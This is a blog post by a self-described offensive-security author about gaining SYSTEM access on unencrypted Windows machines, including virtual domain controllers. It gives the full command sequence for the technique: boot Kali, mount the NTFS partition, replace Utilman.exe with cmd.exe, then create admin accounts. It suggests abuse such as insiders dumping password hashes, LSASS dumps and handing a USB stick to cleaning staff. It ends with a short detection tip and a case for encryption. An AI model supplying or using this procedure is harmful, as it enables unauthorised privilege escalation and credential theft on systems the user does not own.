Easy admin access can be gained for any Windows system that does not use encryption. This includes any virtual systems as well. The beauty of the virtual world is that most systems are deployed using Thin disks, which means they shouldn’t have encryption. The reason is if you encrypt a virtual drive, all the bits are flipped rando characters, which means every sector has to be written to which will then expand the drive to it full capacity hence defeating the reason you made it thin in the first place. And yes this does work on domain controllers. SOOOO think about separation of duties where the VM admins are not domain admins? They need to take a server down for “maintenance”, but instead they use this method to get a SYSTEM prompt to do whatever they want, including dumping passwords and hashes. Not that I have ever done that….but it is a good password recovery method.

And would anyone even notice a DC going offline when you probably have several in your environment? What about once I get admin access to my workstation? Then I can wait for a remote system/user to login and BAM!……admin hashes via LSASS dump. Weakest link folks……weakest link.

Don’t let people lie to you..there are no performance issue with encryption. If they say that, send them to a disc shop, they are still living in that era.

I setup a demo of this at Arctic Con, for the record, this is not some new hot stuff, but people time and time again tell me “Its in our environment and protected so we don’t need to encrypt”, sure. I actually have a USB stick with a script that does all this in less then 5 minutes. Give it to a cleaning person, what do they care. So below are the steps, enjoy. Use your imagination on how to use this. If your mom lost her password again for the 8th time this month, go this route and she forever can reset it.

On a side note, since this is used by people I always hit that accessibility button to see if someone has already helped me….you would be surprised.

For the Blue Team side, I have seen some savvy places that did monitor this. I think there was a few methods, but FIC seems the best way. Using sysmon you can monitor for Utilman.exe running but without a known hash. Good stuff……..

This will allow a user to get a command prompt under the SYSTEM account.   From there you should be able to create a local user with local admin privileges.

  • Boot up usb stick
  • Open a terminal within Kali
  • Make a directory /mnt/windows (mkdir /mnt/windows)
  • Change into that directory (cd /mnt/windows)
  • Search for the largest Windows partition (fdisk -l)
    • Example: /dev/sda4
  • Mount the partition (mount –t ntfs /dev/sda4 /mnt/windows)*
  • Change into directory /Windows/System32
  • Copy the Utilman.exe file to a backup file (cp Utilman.exe Utilman.exe.old)
  • Copy the command shell to Utilman.exe (cp cmd.exe Utilman.exe)
  • Reboot
  • After reboot, click on the accessibility short cut and you should have a cli with SYSTEM privileges.  From there you can create a new admin or change a current admin password.

Author: Sir McGruff

I like to use my imagination to break stuff. I guess that's why I have been involved in Offensive Security for several years. And I do mean both meanings of the work Offensive, hackers have no room for political correctness.

Leave a Reply

Your email address will not be published. Required fields are marked *